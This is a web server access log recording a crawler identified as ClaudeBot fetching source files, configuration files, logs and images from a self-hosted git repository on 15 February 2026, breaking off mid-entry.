git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9950] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12763] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 216.73.216.188] [Length 12195] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5?display=source" [Client 216.73.216.188] [Length 33447] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf?display=source" [Client 216.73.216.188] [Length 12777] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1?display=source" [Client 216.73.216.188] [Length 33640] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 216.73.216.188] [Length 10968] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6?display=source" [Client 216.73.216.188] [Length 35846] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 216.73.216.188] [Length 9855] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 216.73.216.188] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 216.73.216.188] [Length 9929] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4?display=source" [Client 216.73.216.188] [Length 23735] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 216.73.216.188] [Length 11001] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3?display=source" [Client 216.73.216.188] [Length 38765] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 15766] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7?display=source" [Client 216.73.216.188] [Length 10976] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 216.73.216.188] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10962] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 1372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" [Client 216.73.216.188] [Length 9857] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf?display=source" [Client 216.73.216.188] [Length 12984] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 9946] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 216.73.216.188] [Length 10964] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx" [Client 216.73.216.188] [Length 10113] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10963] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf?display=source" [Client 216.73.216.188] [Length 12783] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 12787] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 216.73.216.188] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11917] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11908] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html" [Client 216.73.216.188] [Length 32216] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11323] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11625] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 216.73.216.188] [Length 9856] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html" [Client 216.73.216.188] [Length 22551] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11915] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10866] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 216.73.216.188] [Length 10994] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 9955] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log?display=rendered" [Client 216.73.216.188] [Length 10992] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 9940] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" [Client 216.73.216.188] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; 